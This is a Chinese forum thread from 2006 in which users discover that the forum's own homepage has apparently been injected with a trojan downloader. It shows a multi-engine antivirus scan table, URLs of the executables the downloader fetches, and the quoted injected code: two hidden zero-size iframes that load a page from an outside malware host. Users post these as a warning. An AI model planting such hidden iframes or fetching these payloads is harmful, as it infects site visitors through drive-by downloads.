大麻哈鱼 发表于 2006-9-24 08:21

是不是有问题?

<p>早晨8点发现的。</p><p><table cellspacing="0" cellpadding="0" width="100%" border="0"><thead><tr><td>Antivirus</td><td>Version</td><td align="center">Update</td><td>Result</td></tr></thead><tbody><tr><td>AntiVir</td><td>7.2.0.18</td><td align="center">09.23.2006</td><td class="positivo">HEUR/Crypted</td></tr><tr><td>Authentium</td><td>4.93.8</td><td align="center">09.23.2006 </td><td class="negativo">no virus found</td></tr><tr><td>Avast</td><td>4.7.844.0</td><td align="center">09.22.2006 </td><td class="negativo">no virus found</td></tr><tr><td>AVG</td><td>386</td><td align="center">09.22.2006 </td><td class="negativo">no virus found</td></tr><tr><td>BitDefender</td><td>7.2</td><td align="center">09.23.2006</td><td class="positivo">GenPack:Generic.Malware.Sdld!.5D6BBD49</td></tr><tr><td>CAT-QuickHeal</td><td>8.00</td><td align="center">09.22.2006</td><td class="positivo">(Suspicious) - DNAScan</td></tr><tr><td>ClamAV</td><td>devel-20060426</td><td align="center">09.23.2006 </td><td class="negativo">no virus found</td></tr><tr><td>eTrust-InoculateIT</td><td>23.73.4</td><td align="center">09.24.2006 </td><td class="negativo">no virus found</td></tr><tr><td>eTrust-Vet</td><td>30.3.3093</td><td align="center">09.22.2006 </td><td class="negativo">no virus found</td></tr><tr><td>DrWeb</td><td>4.33</td><td align="center">09.22.2006 </td><td class="negativo">no virus found</td></tr><tr><td>Ewido</td><td>4.0</td><td align="center">09.23.2006</td><td class="positivo">Downloader.VB.akh</td></tr><tr><td>Fortinet</td><td>2.82.0.0</td><td align="center">09.23.2006</td><td class="positivo">suspicious</td></tr><tr><td>F-Prot</td><td>3.16f</td><td align="center">09.23.2006 </td><td class="negativo">no virus found</td></tr><tr><td>F-Prot4</td><td>4.2.1.29</td><td align="center">09.23.2006 </td><td class="negativo">no virus found</td></tr><tr><td>Ikarus</td><td>0.2.65.0</td><td align="center">09.23.2006 </td><td class="negativo">no virus found</td></tr><tr><td>Kaspersky</td><td>4.0.2.24</td><td align="center">09.24.2006 </td><td class="negativo">no virus found</td></tr><tr><td>McAfee</td><td>4858</td><td align="center">09.22.2006 </td><td class="negativo">no virus found</td></tr><tr><td>Microsoft</td><td>1.1560</td><td align="center">09.24.2006 </td><td class="negativo">no virus found</td></tr><tr><td>NOD32v2</td><td>1.1771</td><td align="center">09.23.2006</td><td class="positivo">a variant of Win32/TrojanDownloader.VB.AKH</td></tr><tr><td>Norman</td><td>5.80.02</td><td align="center">09.22.2006 </td><td class="negativo">no virus found</td></tr><tr><td>Panda</td><td>9.0.0.4</td><td align="center">09.23.2006</td><td class="positivo">Suspicious file</td></tr><tr><td>Sophos</td><td>4.09.0</td><td align="center">09.23.2006 </td><td class="negativo">no virus found</td></tr><tr><td>Symantec</td><td>8.0</td><td align="center">09.24.2006 </td><td class="negativo">no virus found</td></tr><tr><td>TheHacker</td><td>6.0.1.077</td><td align="center">09.23.2006 </td><td class="negativo">no virus found</td></tr><tr><td>UNA</td><td>1.83</td><td align="center">09.22.2006 </td><td class="negativo">no virus found</td></tr><tr><td>VBA32</td><td>3.11.1</td><td align="center">09.23.2006 </td><td class="negativo">no virus found</td></tr><tr><td>VirusBuster</td><td>4.3.7:9</td><td align="center">09.23.2006 </td><td class="negativo">no virus found</td></tr></tbody></table></p>

大麻哈鱼 发表于 2006-9-24 08:41

原来是一个downloader,比较低级,taskmgr有进程。自身并未对注册表关键键值操作,运行后主动下载 htt p://ujdmk1.chinaw3.com/wow.exe htt p://www.10223.com/wm/zt.exe htt p://www.10223.com/vm/mh.exe htt p://www.10223.com/vm/jh.exe执行后,算完成使命。下次开机不再启动。

猩猩脖子疼 发表于 2006-9-24 10:12

MCAFEE 图 。

猩猩脖子疼 发表于 2006-9-24 10:20

~~爱爱~~ 发表于 2006-9-24 10:31

什么东东............

猩猩脖子疼 发表于 2006-9-24 11:09

主页上挂脚本了。处理好了删我帖子

starshow0571 发表于 2006-9-24 13:18

没看懂!!!!!!!

jj空白 发表于 2006-9-24 14:18

不懂

我是誰 发表于 2006-9-24 14:58

晕死,楼主说的是,论坛首页被人挂木马了。
最后两句:

<iframe src=&#39;http://ujdmk1.chinaw3.com/xx.html&#39; width=&#39;0&#39; height=&#39;0&#39; scrolling=&#39;no&#39; frameborder=&#39;0&#39;></iframe>
<iframe src=&#39;http://ujdmk1.chinaw3.com/xx.html&#39; width=&#39;0&#39; height=&#39;0&#39; scrolling=&#39;no&#39; frameborder=&#39;0&#39;></iframe>


大家小心!!

海院の水水 发表于 2006-9-24 15:34

貌似网马啊```
页: [1] 2 3
查看完整版本: 是不是有问题?